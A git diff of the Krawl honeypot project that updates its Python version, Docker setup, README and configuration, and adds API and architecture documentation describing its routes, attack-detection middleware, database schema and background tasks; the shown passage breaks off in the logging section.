diff --git a/.github/workflows/pr-checks.yml b/.github/workflows/pr-checks.yml index 9feb01c..d899b13 100644 --- a/.github/workflows/pr-checks.yml +++ b/.github/workflows/pr-checks.yml @@ -20,7 +20,7 @@ jobs: - uses: actions/setup-python@v5 with: - python-version: '3.11' + python-version: '3.13' cache: 'pip' - name: Install dependencies diff --git a/.github/workflows/security-scan.yml b/.github/workflows/security-scan.yml index 732b1b7..3048e62 100644 --- a/.github/workflows/security-scan.yml +++ b/.github/workflows/security-scan.yml @@ -19,7 +19,7 @@ jobs: - uses: actions/setup-python@v5 with: - python-version: '3.11' + python-version: '3.13' cache: 'pip' - name: Install dependencies @@ -48,12 +48,4 @@ jobs: - name: Safety check for dependencies run: safety check --json || true - - - name: Trivy vulnerability scan - uses: aquasecurity/trivy-action@master - with: - scan-type: 'fs' - scan-ref: '.' - format: 'table' - severity: 'CRITICAL,HIGH' - exit-code: '1' + \ No newline at end of file diff --git a/.gitignore b/.gitignore index 6249e18..109cf28 100644 --- a/.gitignore +++ b/.gitignore @@ -68,6 +68,7 @@ data/ *.db *.sqlite *.sqlite3 +backups/ # Temporary files *.tmp @@ -80,4 +81,7 @@ personal-values.yaml #exports dir (keeping .gitkeep so we have the dir) /exports/* -/src/exports/* \ No newline at end of file +/src/exports/* + +# tmux config +.tmux.conf diff --git a/Dockerfile b/Dockerfile index 4015c74..e93a55c 100644 --- a/Dockerfile +++ b/Dockerfile @@ -1,15 +1,16 @@ -FROM python:3.11-slim +FROM python:3.13-slim LABEL org.opencontainers.image.source=https://github.com/BlessedRebuS/Krawl WORKDIR /app # Install gosu for dropping privileges -RUN apt-get update && apt-get install -y --no-install-recommends gosu && \ +RUN apt-get update && apt-get upgrade -y && apt-get install -y --no-install-recommends gosu && \ rm -rf /var/lib/apt/lists/* COPY requirements.txt /app/ -RUN pip install --no-cache-dir -r requirements.txt +RUN pip install --no-cache-dir --upgrade pip && \ + pip install --no-cache-dir -r requirements.txt COPY src/ /app/src/ COPY wordlists.json /app/ @@ -26,4 +27,4 @@ EXPOSE 5000 ENV PYTHONUNBUFFERED=1 ENTRYPOINT ["/app/entrypoint.sh"] -CMD ["python3", "src/server.py"] +CMD ["uvicorn", "app:app", "--host", "0.0.0.0", "--port", "5000", "--app-dir", "src"] diff --git a/README.md b/README.md index 28c45ca..4dc5702 100644 --- a/README.md +++ b/README.md @@ -33,21 +33,25 @@ Helm Chart - -
- -

- What is Krawl? • - Installation • - Honeypot Pages • - Dashboard • - Todo • - Contributing -

- -
+## Table of Contents +- [Demo](#demo) +- [What is Krawl?](#what-is-krawl) +- [Krawl Dashboard](#krawl-dashboard) +- [Installation](#-installation) + - [Docker Run](#docker-run) + - [Docker Compose](#docker-compose) + - [Kubernetes](#kubernetes) +- [Configuration](#configuration) + - [config.yaml](#configuration-via-configyaml) + - [Environment Variables](#configuration-via-enviromental-variables) +- [Ban Malicious IPs](#use-krawl-to-ban-malicious-ips) +- [IP Reputation](#ip-reputation) +- [Forward Server Header](#forward-server-header) +- [Additional Documentation](#additional-documentation) +- [Contributing](#-contributing) + ## Demo Tip: crawl the `robots.txt` paths for additional fun ### Krawl URL: [http://demo.krawlme.com](http://demo.krawlme.com) @@ -67,7 +71,7 @@ It features: - **Fake Login Pages**: WordPress, phpMyAdmin, admin panels - **Honeypot Paths**: Advertised in robots.txt to catch scanners - **Fake Credentials**: Realistic-looking usernames, passwords, API keys -- **[Canary Token](#customizing-the-canary-token) Integration**: External alert triggering +- **[Canary Token](docs/canary-token.md) Integration**: External alert triggering - **Random server headers**: Confuse attacks based on server header and version - **Real-time Dashboard**: Monitor suspicious activity - **Customizable Wordlists**: Easy JSON-based configuration @@ -75,8 +79,28 @@ It features: ![dashboard](img/deception-page.png) + +## Krawl Dashboard + +Krawl provides a comprehensive dashboard, accessible at a **random secret path** generated at startup or at a **custom path** configured via `KRAWL_DASHBOARD_SECRET_PATH`. This keeps the dashboard hidden from attackers scanning your honeypot. + +The dashboard is organized in three main tabs: + +- **Overview** — High-level view of attack activity: an interactive map of IP origins, recent suspicious requests, and top IPs, User-Agents, and paths. + ![geoip](img/geoip_dashboard.png) +- **Attacks** — Detailed breakdown of captured credentials, honeypot triggers, and detected attack types (SQLi, XSS, path traversal, etc.) with charts and tables. + +![attack_types](img/attack_types.png) + +- **IP Insight** — In-depth forensic view of a selected IP: geolocation, ISP/ASN info, reputation flags, behavioral timeline, attack type distribution, and full access history. + +![ipinsight](img/ip_insight_dashboard.png) + +For more details, see the [Dashboard documentation](docs/dashboard.md). + + ## 🚀 Installation ### Docker Run @@ -89,7 +113,7 @@ docker run -d \ -e KRAWL_PORT=5000 \ -e KRAWL_DELAY=100 \ -e KRAWL_DASHBOARD_SECRET_PATH="/my-secret-dashboard" \ - -e KRAWL_DATABASE_RETENTION_DAYS=30 \ + -v krawl-data:/app/data \ --name krawl \ ghcr.io/blessedrebus/krawl:latest ``` @@ -112,6 +136,8 @@ services: - TZ=Europe/Rome volumes: - ./config.yaml:/app/config.yaml:ro + # bind mount for firewall exporters + - ./exports:/app/exports - krawl-data:/app/data restart: unless-stopped @@ -134,6 +160,75 @@ docker-compose down ### Kubernetes **Krawl is also available natively on Kubernetes**. Installation can be done either [via manifest](kubernetes/README.md) or [using the helm chart](helm/README.md). + +## Configuration +Krawl uses a **configuration hierarchy** in which **environment variables take precedence over the configuration file**. This approach is recommended for Docker deployments and quick out-of-the-box customization. + +### Configuration via config.yaml +You can use the [config.yaml](config.yaml) file for advanced configurations, such as Docker Compose or Helm chart deployments. + +### Configuration via Enviromental Variables + +| Environment Variable | Description | Default | +|----------------------|-------------|---------| +| `CONFIG_LOCATION` | Path to yaml config file | `config.yaml` | +| `KRAWL_PORT` | Server listening port | `5000` | +| `KRAWL_DELAY` | Response delay in milliseconds | `100` | +| `KRAWL_SERVER_HEADER` | HTTP Server header for deception | `""` | +| `KRAWL_LINKS_LENGTH_RANGE` | Link length range as `min,max` | `5,15` | +| `KRAWL_LINKS_PER_PAGE_RANGE` | Links per page as `min,max` | `10,15` | +| `KRAWL_CHAR_SPACE` | Characters used for link generation | `abcdefgh...` | +| `KRAWL_MAX_COUNTER` | Initial counter value | `10` | +| `KRAWL_CANARY_TOKEN_URL` | External canary token URL | None | +| `KRAWL_CANARY_TOKEN_TRIES` | Requests before showing canary token | `10` | +| `KRAWL_DASHBOARD_SECRET_PATH` | Custom dashboard path | Auto-generated | +| `KRAWL_PROBABILITY_ERROR_CODES` | Error response probability (0-100%) | `0` | +| `KRAWL_DATABASE_PATH` | Database file location | `data/krawl.db` | +| `KRAWL_EXPORTS_PATH` | Path where firewalls rule sets are exported | `exports` | +| `KRAWL_BACKUPS_PATH` | Path where database dump are saved | `backups` | +| `KRAWL_BACKUPS_CRON` | cron expression to control backup job schedule | `*/30 * * * *` | +| `KRAWL_BACKUPS_ENABLED` | Boolean to enable db dump job | `true` | +| `KRAWL_DATABASE_RETENTION_DAYS` | Days to retain data in database | `30` | +| `KRAWL_HTTP_RISKY_METHODS_THRESHOLD` | Threshold for risky HTTP methods detection | `0.1` | +| `KRAWL_VIOLATED_ROBOTS_THRESHOLD` | Threshold for robots.txt violations | `0.1` | +| `KRAWL_UNEVEN_REQUEST_TIMING_THRESHOLD` | Coefficient of variation threshold for timing | `0.5` | +| `KRAWL_UNEVEN_REQUEST_TIMING_TIME_WINDOW_SECONDS` | Time window for request timing analysis in seconds | `300` | +| `KRAWL_USER_AGENTS_USED_THRESHOLD` | Threshold for detecting multiple user agents | `2` | +| `KRAWL_ATTACK_URLS_THRESHOLD` | Threshold for attack URL detection | `1` | +| `KRAWL_INFINITE_PAGES_FOR_MALICIOUS` | Serve infinite pages to malicious IPs | `true` | +| `KRAWL_MAX_PAGES_LIMIT` | Maximum page limit for crawlers | `250` | +| `KRAWL_BAN_DURATION_SECONDS` | Ban duration in seconds for rate-limited IPs | `600` | + +For example + +```bash +# Set canary token +export CONFIG_LOCATION="config.yaml" +export KRAWL_CANARY_TOKEN_URL="http://your-canary-token-url" + +# Set number of pages range (min,max format) +export KRAWL_LINKS_PER_PAGE_RANGE="5,25" + +# Set analyzer thresholds +export KRAWL_HTTP_RISKY_METHODS_THRESHOLD="0.2" +export KRAWL_VIOLATED_ROBOTS_THRESHOLD="0.15" + +# Set custom dashboard path +export KRAWL_DASHBOARD_SECRET_PATH="/my-secret-dashboard" +``` + +Example of a Docker run with env variables: + +```bash +docker run -d \ + -p 5000:5000 \ + -e KRAWL_PORT=5000 \ + -e KRAWL_DELAY=100 \ + -e KRAWL_CANARY_TOKEN_URL="http://your-canary-token-url" \ + --name krawl \ + ghcr.io/blessedrebus/krawl:latest +``` + ## Use Krawl to Ban Malicious IPs Krawl uses a reputation-based system to classify attacker IP addresses. Every five minutes, Krawl exports the identified malicious IPs to a `malicious_ips.txt` file. @@ -143,7 +238,11 @@ This file can either be mounted from the Docker container into another system or curl https://your-krawl-instance//api/download/malicious_ips.txt ``` -This file can be used to [update a set of firewall rules](https://www.allthingstech.ch/using-opnsense-and-ip-blocklists-to-block-malicious-traffic), for example on OPNsense and pfSense, enabling automatic blocking of malicious IPs or using IPtables +This file enables automatic blocking of malicious traffic across various platforms. You can use it to update firewall rules on: +* [OPNsense and pfSense](https://www.allthingstech.ch/using-opnsense-and-ip-blocklists-to-block-malicious-traffic) +* [RouterOS](https://rentry.co/krawl-routeros) +* [IPtables](plugins/iptables/README.md) and [Nftables](plugins/nftables/README.md) +* [Fail2Ban](plugins/fail2ban/README.md) ## IP Reputation Krawl [uses tasks that analyze recent traffic to build and continuously update an IP reputation](src/tasks/analyze_ips.py) score. It runs periodically and evaluates each active IP address based on multiple behavioral indicators to classify it as an attacker, crawler, or regular user. Thresholds are fully customizable. @@ -176,194 +275,17 @@ location / { } ``` -## API -Krawl uses the following APIs -- https://iprep.lcrawl.com (IP Reputation) -- https://nominatim.openstreetmap.org/reverse (Reverse IP Lookup) -- https://api.ipify.org (Public IP discovery) -- http://ident.me (Public IP discovery) -- https://ifconfig.me (Public IP discovery) +## Additional Documentation -## Configuration -Krawl uses a **configuration hierarchy** in which **environment variables take precedence over the configuration file**. This approach is recommended for Docker deployments and quick out-of-the-box customization. - -### Configuration via Enviromental Variables - -| Environment Variable | Description | Default | -|----------------------|-------------|---------| -| `CONFIG_LOCATION` | Path to yaml config file | `config.yaml` | -| `KRAWL_PORT` | Server listening port | `5000` | -| `KRAWL_DELAY` | Response delay in milliseconds | `100` | -| `KRAWL_SERVER_HEADER` | HTTP Server header for deception | `""` | -| `KRAWL_LINKS_LENGTH_RANGE` | Link length range as `min,max` | `5,15` | -| `KRAWL_LINKS_PER_PAGE_RANGE` | Links per page as `min,max` | `10,15` | -| `KRAWL_CHAR_SPACE` | Characters used for link generation | `abcdefgh...` | -| `KRAWL_MAX_COUNTER` | Initial counter value | `10` | -| `KRAWL_CANARY_TOKEN_URL` | External canary token URL | None | -| `KRAWL_CANARY_TOKEN_TRIES` | Requests before showing canary token | `10` | -| `KRAWL_DASHBOARD_SECRET_PATH` | Custom dashboard path | Auto-generated | -| `KRAWL_PROBABILITY_ERROR_CODES` | Error response probability (0-100%) | `0` | -| `KRAWL_DATABASE_PATH` | Database file location | `data/krawl.db` | -| `KRAWL_DATABASE_RETENTION_DAYS` | Days to retain data in database | `30` | -| `KRAWL_HTTP_RISKY_METHODS_THRESHOLD` | Threshold for risky HTTP methods detection | `0.1` | -| `KRAWL_VIOLATED_ROBOTS_THRESHOLD` | Threshold for robots.txt violations | `0.1` | -| `KRAWL_UNEVEN_REQUEST_TIMING_THRESHOLD` | Coefficient of variation threshold for timing | `0.5` | -| `KRAWL_UNEVEN_REQUEST_TIMING_TIME_WINDOW_SECONDS` | Time window for request timing analysis in seconds | `300` | -| `KRAWL_USER_AGENTS_USED_THRESHOLD` | Threshold for detecting multiple user agents | `2` | -| `KRAWL_ATTACK_URLS_THRESHOLD` | Threshold for attack URL detection | `1` | -| `KRAWL_INFINITE_PAGES_FOR_MALICIOUS` | Serve infinite pages to malicious IPs | `true` | -| `KRAWL_MAX_PAGES_LIMIT` | Maximum page limit for crawlers | `250` | -| `KRAWL_BAN_DURATION_SECONDS` | Ban duration in seconds for rate-limited IPs | `600` | - -For example - -```bash -# Set canary token -export CONFIG_LOCATION="config.yaml" -export KRAWL_CANARY_TOKEN_URL="http://your-canary-token-url" - -# Set number of pages range (min,max format) -export KRAWL_LINKS_PER_PAGE_RANGE="5,25" - -# Set analyzer thresholds -export KRAWL_HTTP_RISKY_METHODS_THRESHOLD="0.2" -export KRAWL_VIOLATED_ROBOTS_THRESHOLD="0.15" - -# Set custom dashboard path -export KRAWL_DASHBOARD_SECRET_PATH="/my-secret-dashboard" -``` - -Example of a Docker run with env variables: - -```bash -docker run -d \ - -p 5000:5000 \ - -e KRAWL_PORT=5000 \ - -e KRAWL_DELAY=100 \ - -e KRAWL_CANARY_TOKEN_URL="http://your-canary-token-url" \ - --name krawl \ - ghcr.io/blessedrebus/krawl:latest -``` - -### Configuration via config.yaml -You can use the [config.yaml](config.yaml) file for more advanced configurations, such as Docker Compose or Helm chart deployments. - -# Honeypot -Below is a complete overview of the Krawl honeypot’s capabilities - -## robots.txt -The actual (juicy) robots.txt configuration [is the following](src/templates/html/robots.txt). - -## Honeypot pages -Requests to common admin endpoints (`/admin/`, `/wp-admin/`, `/phpMyAdmin/`) return a fake login page. Any login attempt triggers a 1-second delay to simulate real processing and is fully logged in the dashboard (credentials, IP, headers, timing). - -![admin page](img/admin-page.png) - - -Requests to paths like `/backup/`, `/config/`, `/database/`, `/private/`, or `/uploads/` return a fake directory listing populated with “interesting” files, each assigned a random file size to look realistic. - -![directory-page](img/directory-page.png) - -The `.env` endpoint exposes fake database connection strings, **AWS API keys**, and **Stripe secrets**. It intentionally returns an error due to the `Content-Type` being `application/json` instead of plain text, mimicking a “juicy” misconfiguration that crawlers and scanners often flag as information leakage. - -The `/server` page displays randomly generated fake error information for each known server. - -![server and env page](img/server-and-env-page.png) - -The pages `/api/v1/users` and `/api/v2/secrets` show fake users and random secrets in JSON format - -![users and secrets](img/users-and-secrets.png) - -The pages `/credentials.txt` and `/passwords.txt` show fake users and random secrets - -![credentials and passwords](img/credentials-and-passwords.png) - -Pages such as `/users`, `/search`, `/contact`, `/info`, `/input`, and `/feedback`, along with APIs like `/api/sql` and `/api/database`, are designed to lure attackers into performing attacks such as **SQL injection** or **XSS**. - -![sql injection](img/sql_injection.png) - -Automated tools like **SQLMap** will receive a different randomized database error on each request, increasing scan noise and confusing the attacker. All detected attacks are logged and displayed in the dashboard. - -## Example usage behind reverse proxy - -You can configure a reverse proxy so all web requests land on the Krawl page by default, and hide your real content behind a secret hidden url. For example: - -```bash -location / { - proxy_pass https://your-krawl-instance; - proxy_pass_header Server; -} - -location /my-hidden-service { - proxy_pass https://my-hidden-service; - proxy_pass_header Server; -} -``` - -Alternatively, you can create a bunch of different "interesting" looking domains. For example: - -- admin.example.com -- portal.example.com -- sso.example.com -- login.example.com -- ... - -Additionally, you may configure your reverse proxy to forward all non-existing subdomains (e.g. nonexistent.example.com) to one of these domains so that any crawlers that are guessing domains at random will automatically end up at your Krawl instance. - -## Customizing the Canary Token -To create a custom canary token, visit https://canarytokens.org - -and generate a “Web bug” canary token. - -This optional token is triggered when a crawler fully traverses the webpage until it reaches 0. At that point, a URL is returned. When this URL is requested, it sends an alert to the user via email, including the visitor’s IP address and user agent. - - -To enable this feature, set the canary token URL [using the environment variable](#configuration-via-environment-variables) `KRAWL_CANARY_TOKEN_URL`. - -## Customizing the wordlist - -Edit `wordlists.json` to customize fake data for your use case - -```json -{ - "usernames": { - "prefixes": ["admin", "root", "user"], - "suffixes": ["_prod", "_dev", "123"] - }, - "passwords": { - "prefixes": ["P@ssw0rd", "Admin"], - "simple": ["test", "password"] - }, - "directory_listing": { - "files": ["credentials.txt", "backup.sql"], - "directories": ["admin/", "backup/"] - } -} -``` - -or **values.yaml** in the case of helm chart installation - -## Dashboard - -Access the dashboard at `http://:/` - -The dashboard shows: -- Total and unique accesses -- Suspicious activity and attack detection -- Top IPs, paths, user-agents and GeoIP localization -- Real-time monitoring - -The attackers’ access to the honeypot endpoint and related suspicious activities (such as failed login attempts) are logged. - -Krawl also implements a scoring system designed to distinguish between malicious and legitimate behavior on the website. - -![dashboard-1](img/dashboard-1.png) - -The top IP Addresses is shown along with top paths and User Agents - -![dashboard-2](img/dashboard-2.png) - -![dashboard-3](img/dashboard-3.png) +| Topic | Description | +|-------|-------------| +| [API](docs/api.md) | External APIs used by Krawl for IP data, reputation, and geolocation | +| [Honeypot](docs/honeypot.md) | Full overview of honeypot pages: fake logins, directory listings, credential files, SQLi/XSS/XXE/command injection traps, and more | +| [Reverse Proxy](docs/reverse-proxy.md) | How to deploy Krawl behind NGINX or use decoy subdomains | +| [Database Backups](docs/backups.md) | Enable and configure the automatic database dump job | +| [Canary Token](docs/canary-token.md) | Set up external alert triggers via canarytokens.org | +| [Wordlist](docs/wordlist.md) | Customize fake usernames, passwords, and directory listings | +| [Dashboard](docs/dashboard.md) | Access and explore the real-time monitoring dashboard | ## 🤝 Contributing @@ -374,13 +296,9 @@ Contributions welcome! Please: 4. Submit a pull request (explain the changes!) -
- -## ⚠️ Disclaimer - -**This is a deception/honeypot system.** -Deploy in isolated environments and monitor carefully for security events. -Use responsibly and in compliance with applicable laws and regulations. +## Disclaimer +> [!CAUTION] +> This is a deception/honeypot system. Deploy in isolated environments and monitor carefully for security events. Use responsibly and in compliance with applicable laws and regulations. ## Star History -Star History Chart +Star History Chart \ No newline at end of file diff --git a/ToDo.md b/ToDo.md deleted file mode 100644 index 49e8d68..0000000 --- a/ToDo.md +++ /dev/null @@ -1,5 +0,0 @@ -# Krawl - Todo List - -- Add Prometheus exporter for metrics -- Add POST cresentials information (eg: username and password used) -- Add CloudFlare error pages \ No newline at end of file diff --git a/config.yaml b/config.yaml index c29ebe4..dd61720 100644 --- a/config.yaml +++ b/config.yaml @@ -23,7 +23,18 @@ dashboard: # if set to "null" this will Auto-generates random path if not set # can be set to "/dashboard" or similar <-- note this MUST include a forward slash # secret_path: super-secret-dashboard-path - secret_path: test + secret_path: null + +backups: + path: "backups" + cron: "*/30 * * * *" + enabled: false + +exports: + path: "exports" + +logging: + level: "DEBUG" # DEBUG, INFO, WARNING, ERROR, CRITICAL database: path: "data/krawl.db" @@ -43,4 +54,4 @@ analyzer: crawl: infinite_pages_for_malicious: true max_pages_limit: 250 - ban_duration_seconds: 600 \ No newline at end of file + ban_duration_seconds: 600 diff --git a/docker-compose.yaml b/docker-compose.yaml index 233692b..17680de 100644 --- a/docker-compose.yaml +++ b/docker-compose.yaml @@ -1,4 +1,5 @@ --- +# THIS IS FOR DEVELOPMENT PURPOSES services: krawl: build: @@ -16,17 +17,14 @@ services: - ./config.yaml:/app/config.yaml:ro - ./logs:/app/logs - ./exports:/app/exports - - data:/app/data + - ./data:/app/data + - ./backups:/app/backups restart: unless-stopped develop: watch: - path: ./Dockerfile action: rebuild - path: ./src/ - action: sync+restart - target: /app/src + action: rebuild - path: ./docker-compose.yaml action: rebuild - -volumes: - data: diff --git a/docs/api.md b/docs/api.md new file mode 100644 index 0000000..8d4ab18 --- /dev/null +++ b/docs/api.md @@ -0,0 +1,9 @@ +# API + +Krawl uses the following APIs +- http://ip-api.com (IP Data) +- https://iprep.lcrawl.com (IP Reputation) +- https://nominatim.openstreetmap.org/reverse (Reverse IP Lookup) +- https://api.ipify.org (Public IP discovery) +- http://ident.me (Public IP discovery) +- https://ifconfig.me (Public IP discovery) diff --git a/docs/architecture.md b/docs/architecture.md new file mode 100644 index 0000000..75b7296 --- /dev/null +++ b/docs/architecture.md @@ -0,0 +1,372 @@ +# Krawl Architecture + +## Overview + +Krawl is a cloud-native deception honeypot server built on **FastAPI**. It creates realistic fake web applications (admin panels, login pages, fake credentials) to attract, detect, and analyze malicious crawlers and attackers while wasting their resources with infinite spider-trap pages. + +## Tech Stack + +| Layer | Technology | +|-------|-----------| +| **Backend** | FastAPI, Uvicorn, Python 3.11 | +| **ORM / DB** | SQLAlchemy 2.0, SQLite (WAL mode) | +| **Templating** | Jinja2 (server-side rendering) | +| **Reactivity** | Alpine.js 3.14 | +| **Partial Updates** | HTMX 2.0 | +| **Charts** | Chart.js 3.9 (doughnut), custom SVG radar | +| **Maps** | Leaflet 1.9 + CartoDB dark tiles | +| **Scheduling** | APScheduler | +| **Container** | Docker (python:3.11-slim), Helm/K8s ready | + +## Directory Structure + +``` +Krawl/ +├── src/ +│ ├── app.py # FastAPI app factory + lifespan +│ ├── config.py # YAML + env config loader +│ ├── dependencies.py # DI providers (templates, DB, client IP) +│ ├── database.py # DatabaseManager singleton +│ ├── models.py # SQLAlchemy ORM models +│ ├── tracker.py # In-memory + DB access tracking +│ ├── logger.py # Rotating file log handlers +│ ├── deception_responses.py # Attack detection + fake responses +│ ├── sanitizer.py # Input sanitization +│ ├── generators.py # Random content generators +│ ├── wordlists.py # JSON wordlist loader +│ ├── geo_utils.py # IP geolocation API +│ ├── ip_utils.py # IP validation +│ │ +│ ├── routes/ +│ │ ├── honeypot.py # Trap pages, credential capture, catch-all +│ │ ├── dashboard.py # Dashboard page (Jinja2 SSR) +│ │ ├── api.py # JSON API endpoints +│ │ └── htmx.py # HTMX HTML fragment endpoints +│ │ +│ ├── middleware/ +│ │ ├── deception.py # Path traversal / XXE / cmd injection detection +│ │ └── ban_check.py # Banned IP enforcement +│ │ +│ ├── tasks/ # APScheduler background jobs +│ │ ├── analyze_ips.py # IP categorization scoring +│ │ ├── fetch_ip_rep.py # Geolocation + blocklist enrichment +│ │ ├── db_dump.py # Database export +│ │ ├── memory_cleanup.py # In-memory list trimming +│ │ └── top_attacking_ips.py # Top attacker caching +│ │ +│ ├── tasks_master.py # Task discovery + APScheduler orchestrator +│ ├── firewall/ # Banlist export (iptables, raw) +│ ├── migrations/ # Schema migrations (auto-run) +│ │ +│ └── templates/ +│ ├── jinja2/ +│ │ ├── base.html # Layout + CDN scripts +│ │ └── dashboard/ +│ │ ├── index.html # Main dashboard page +│ │ └── partials/ # 13 HTMX fragment templates +│ ├── html/ # Deceptive trap page templates +│ └── static/ +│ ├── css/dashboard.css +│ └── js/ +│ ├── dashboard.js # Alpine.js app controller +│ ├── map.js # Leaflet map +│ ├── charts.js # Chart.js doughnut +│ └── radar.js # SVG radar chart +│ +├── config.yaml # Application configuration +├── wordlists.json # Attack patterns + fake credentials +├── Dockerfile # Container build +├── docker-compose.yaml # Local orchestration +├── entrypoint.sh # Container startup (gosu privilege drop) +├── kubernetes/ # K8s manifests +└── helm/ # Helm chart +``` + +## Application Entry Point + +`src/app.py` uses the **FastAPI application factory** pattern with an async lifespan manager: + +``` +Startup Shutdown + │ │ + ├─ Initialize logging └─ Log shutdown + ├─ Initialize SQLite DB + ├─ Create AccessTracker + ├─ Load webpages file (optional) + ├─ Store config + tracker in app.state + ├─ Start APScheduler background tasks + └─ Log dashboard URL +``` + +## Request Pipeline + +``` + Request + │ + ▼ +┌──────────────────────┐ +│ BanCheckMiddleware │──→ IP banned? → Return 500 +└──────────┬───────────┘ + ▼ +┌──────────────────────┐ +│ DeceptionMiddleware │──→ Attack detected? → Fake error response +└──────────┬───────────┘ + ▼ +┌───────────────────────┐ +│ ServerHeaderMiddleware│──→ Add random Server header +└──────────┬────────────┘ + ▼ +┌───────────────────────┐ +│ Route Matching │ +│ (ordered by priority)│ +│ │ +│ 1. Static files │ /{secret}/static/* +│ 2. Dashboard router │ /{secret}/ (prefix-based) +│ 3. API router │ /{secret}/api/* (prefix-based) +│ 4. HTMX router │ /{secret}/htmx/* (prefix-based) +│ 5. Honeypot router │ /* (catch-all) +└───────────────────────┘ +``` + +### Prefix-Based Routing + +Dashboard, API, and HTMX routers are mounted with `prefix=f"/{secret}"` in `app.py`. This means: +- Route handlers define paths **without** the secret (e.g., `@router.get("/api/all-ips")`) +- FastAPI prepends the secret automatically (e.g., `GET /a1b2c3/api/all-ips`) +- The honeypot catch-all `/{path:path}` only matches paths that **don't** start with the secret +- No `_is_dashboard_path()` checks needed — the prefix handles access scoping + +## Route Architecture + +### Honeypot Routes (`routes/honeypot.py`) + +| Method | Path | Response | +|--------|------|----------| +| `GET` | `/{path:path}` | Trap page with random links (catch-all) | +| `HEAD` | `/{path:path}` | 200 OK | +| `POST` | `/{path:path}` | Credential capture | +| `GET` | `/admin`, `/login` | Fake login form | +| `GET` | `/wp-admin`, `/wp-login.php` | Fake WordPress login | +| `GET` | `/phpmyadmin` | Fake phpMyAdmin | +| `GET` | `/robots.txt` | Honeypot paths advertised | +| `GET/POST` | `/api/search`, `/api/sql` | SQL injection honeypot | +| `POST` | `/api/contact` | XSS detection endpoint | +| `GET` | `/.env`, `/credentials.txt` | Fake sensitive files | + +### Dashboard Routes (`routes/dashboard.py`) + +| Method | Path | Response | +|--------|------|----------| +| `GET` | `/` | Server-rendered dashboard (Jinja2) | + +### API Routes (`routes/api.py`) + +| Method | Path | Response | +|--------|------|----------| +| `GET` | `/api/all-ips` | Paginated IP list with stats | +| `GET` | `/api/attackers` | Paginated attacker IPs | +| `GET` | `/api/ip-stats/{ip}` | Single IP detail | +| `GET` | `/api/credentials` | Captured credentials | +| `GET` | `/api/honeypot` | Honeypot trigger counts | +| `GET` | `/api/top-ips` | Top requesting IPs | +| `GET` | `/api/top-paths` | Most requested paths | +| `GET` | `/api/top-user-agents` | Top user agents | +| `GET` | `/api/attack-types-stats` | Attack type distribution | +| `GET` | `/api/attack-types` | Paginated attack log | +| `GET` | `/api/raw-request/{id}` | Full HTTP request | +| `GET` | `/api/get_banlist` | Export ban rules | + +### HTMX Fragment Routes (`routes/htmx.py`) + +Each returns a server-rendered Jinja2 partial (`hx-swap="innerHTML"`): + +| Path | Template | +|------|----------| +| `/htmx/honeypot` | `honeypot_table.html` | +| `/htmx/top-ips` | `top_ips_table.html` | +| `/htmx/top-paths` | `top_paths_table.html` | +| `/htmx/top-ua` | `top_ua_table.html` | +| `/htmx/attackers` | `attackers_table.html` | +| `/htmx/credentials` | `credentials_table.html` | +| `/htmx/attacks` | `attack_types_table.html` | +| `/htmx/patterns` | `patterns_table.html` | +| `/htmx/ip-detail/{ip}` | `ip_detail.html` | + +## Database Schema + +``` +┌─────────────────┐ ┌──────────────────┐ +│ AccessLog │ │ AttackDetection │ +├─────────────────┤ ├──────────────────┤ +│ id (PK) │◄────│ access_log_id(FK)│ +│ ip (indexed) │ │ attack_type │ +│ path │ │ matched_pattern │ +│ user_agent │ └──────────────────┘ +│ method │ +│ is_suspicious │ ┌──────────────────┐ +│ is_honeypot │ │CredentialAttempt │ +│ timestamp │ ├──────────────────┤ +│ raw_request │ │ id (PK) │ +└─────────────────┘ │ ip (indexed) │ + │ path, username │ +┌─────────────────┐ │ password │ +│ IpStats │ │ timestamp │ +├─────────────────┤ └──────────────────┘ +│ ip (PK) │ +│ total_requests │ ┌──────────────────┐ +│ first/last_seen │ │ CategoryHistory │ +│ country_code │ ├──────────────────┤ +│ city, lat, lon │ │ id (PK) │ +│ asn, asn_org │ │ ip (indexed) │ +│ isp, reverse │ │ old_category │ +│ is_proxy │ │ new_category │ +│ is_hosting │ │ timestamp │ +│ list_on (JSON) │ └──────────────────┘ +│ category │ +│ category_scores │ +│ analyzed_metrics│ +│ manual_category │ +└─────────────────┘ +``` + +**SQLite config:** WAL mode, 30s busy timeout, file permissions 600. + +## Frontend Architecture + +``` +base.html + ├── CDN: Leaflet, Chart.js, HTMX, Alpine.js (deferred) + ├── Static: dashboard.css + │ + └── dashboard/index.html (extends base) + │ + ├── Stats cards ──────────── Server-rendered on page load + ├── Suspicious table ─────── Server-rendered on page load + │ + ├── Overview tab (Alpine.js x-show) + │ ├── Honeypot table ───── HTMX hx-get on load + │ ├── Top IPs table ────── HTMX hx-get on load + │ ├── Top Paths table ──── HTMX hx-get on load + │ ├── Top UA table ─────── HTMX hx-get on load + │ └── Credentials table ── HTMX hx-get on load + │ + └── Attacks tab (Alpine.js x-show, lazy init) + ├── Attackers table ──── HTMX hx-get on load + ├── Map ──────────────── Leaflet (init on tab switch) + ├── Chart ────────────── Chart.js (init on tab switch) + ├── Attack types table ─ HTMX hx-get on load + └── Patterns table ───── HTMX hx-get on load +``` + +**Responsibility split:** +- **Alpine.js** — Tab state, modals, dropdowns, lazy initialization +- **HTMX** — Table pagination, sorting, IP detail expansion +- **Leaflet** — Interactive map with category-colored markers +- **Chart.js** — Doughnut chart for attack type distribution +- **Custom SVG** — Radar charts for IP category scores + +## Background Tasks + +Managed by `TasksMaster` (APScheduler). Tasks are auto-discovered from `src/tasks/`. + +| Task | Schedule | Purpose | +|------|----------|---------| +| `analyze_ips` | Every 1 min | Score IPs into categories (attacker, crawler, user) | +| `fetch_ip_rep` | Every 5 min | Enrich IPs with geolocation + blocklist data | +| `db_dump` | Configurable | Export database backups | +| `memory_cleanup` | Periodic | Trim in-memory lists | +| `top_attacking_ips` | Periodic | Cache top attackers | + +### IP Categorization Model + +Each IP is scored across 4 categories based on: +- HTTP method distribution (risky methods ratio) +- Robots.txt violations +- Request timing anomalies (coefficient of variation) +- User-Agent diversity +- Attack URL detection + +Categories: `attacker`, `bad_crawler`, `good_crawler`, `regular_user`, `unknown` + +## Configuration + +`config.yaml` with environment variable overrides (`KRAWL_{FIELD}`): + +```yaml +server: + port: 5000 + delay: 100 # Response delay (ms) + +dashboard: + secret_path: "test" # Auto-generates if null + +database: + path: "data/krawl.db" + retention_days: 30 + +crawl: + infinite_pages_for_malicious: true + max_pages_limit: 250 + ban_duration_seconds: 600 + +behavior: + probability_error_codes: 0 # 0-100% + +canary: + token_url: null # External canary alert URL +``` + +## Logging + +Three 